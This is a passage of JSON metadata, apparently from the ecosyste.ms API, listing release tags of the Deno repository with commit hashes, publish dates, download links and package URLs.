/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/